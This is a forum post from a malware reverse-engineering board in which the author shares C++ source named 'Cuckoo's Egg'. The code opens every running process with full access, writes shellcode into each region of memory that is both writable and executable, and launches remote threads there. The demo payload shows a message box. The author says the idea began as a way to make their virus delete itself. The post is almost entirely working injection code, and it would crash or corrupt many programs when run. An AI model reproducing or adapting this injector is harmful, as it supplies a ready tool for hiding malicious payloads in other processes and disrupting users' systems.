Jump to content
Tuts 4 You

Cuckoo's Egg (proc injection)

JMC31337

By JMC31337
in Malware Reverse Engineering

 Share

Recommended Posts

JMC31337

JMC31337

Posted
Posted

call it cuckoo's egg because a Cuckoo bird is a parasite that lays its eggs in other birds' nests :dunno:

(got started on this idea in order to self delete my virus)

searches through all processes and inject a remote thread spawning a messagebox in every mem location with RWX

combined and modded up code from rwx-hunter.cpp and https://www.cnblogs.com/LyShark/p/13707084.html

  

#include <windows.h>
#include <iostream>
#include <psapi.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <conio.h>


unsigned char shell2[] = "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\xB9\xFF\xFF\xFF\xFF\xFF\xD1\xC3";
  //pusha
  //push 0
  //push 0
  //push 0
  //push 0
  //call ecx
  //popa
  //ret
  
  
VOID ScanProcs(HANDLE hProc)
{

	SIZE_T stSize = 0;
	PBYTE pAdd = (PBYTE)0;
	SYSTEM_INFO si;
	MEMORY_BASIC_INFORMATION mbi = { 0 };
	ZeroMemory(&si,sizeof(SYSTEM_INFO));
	GetSystemInfo(&si);
	pAdd = (PBYTE)si.lpMinimumApplicationAddress;
	
	printf("-----------------------------------------\n");
	
	while (pAdd < (PBYTE)si.lpMaximumApplicationAddress)
	{
		ZeroMemory(&mbi,sizeof(MEMORY_BASIC_INFORMATION));
		stSize = VirtualQueryEx(hProc, pAdd, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
	
		if (stSize == 0)
		{
			pAdd += si.dwPageSize;
			continue;
		}
		
		if (mbi.Protect & PAGE_EXECUTE_READWRITE)
		{
			printf("BaseAddress:0x%08X \t\n", mbi.BaseAddress);
			printf("RWE!!!!\n");
			WriteProcessMemory(hProc, mbi.BaseAddress, shell2, sizeof(shell2), NULL);
			CreateRemoteThread(hProc,NULL,NULL,(LPTHREAD_START_ROUTINE)mbi.BaseAddress,mbi.BaseAddress,NULL,NULL);
		}
		
		if (mbi.Protect & PAGE_EXECUTE_WRITECOPY)
		{
			printf("BaseAddress:0x%08X \t\n", mbi.BaseAddress);
			printf("EWCOPY!!!!\n");
			WriteProcessMemory(hProc, mbi.BaseAddress, shell2, sizeof(shell2), NULL);
			CreateRemoteThread(hProc, NULL, NULL,(LPTHREAD_START_ROUTINE)mbi.BaseAddress,mbi.BaseAddress,NULL,NULL);
		}
		
		pAdd = (PBYTE)mbi.BaseAddress + mbi.RegionSize;
	}
}



int main()
{
	getchar();

	HMODULE user32 = LoadLibraryA("user32.dll");
	VOID* mbox = GetProcAddress(user32, "MessageBoxA");
	DWORD x = (DWORD)mbox;
	DWORD y = (DWORD)shell2;

	_asm
	{
	
		//int 3
		pusha
		mov eax,x
		mov ecx,y 
		add ecx,0x09
		mov [ecx],eax
		popa
	
	}

	printf("add:%x",(DWORD)mbox);
	//getchar();

	HANDLE hProc;
	HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
	PROCESSENTRY32 pe32 = {};
	pe32.dwSize = sizeof(PROCESSENTRY32);
	DWORD bw = 0;
	Process32First(snap,&pe32);

	while (Process32Next(snap,&pe32))
	{
		
		hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
		if (hProc)
		{

			std::wcout << pe32.szExeFile << " Run it? \n";

			//int i = _getch();
			//if (i == '1')
			//{
				ScanProcs(hProc);
				//getchar();
			//}
		
		}
	
	}
	return 0;

}

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...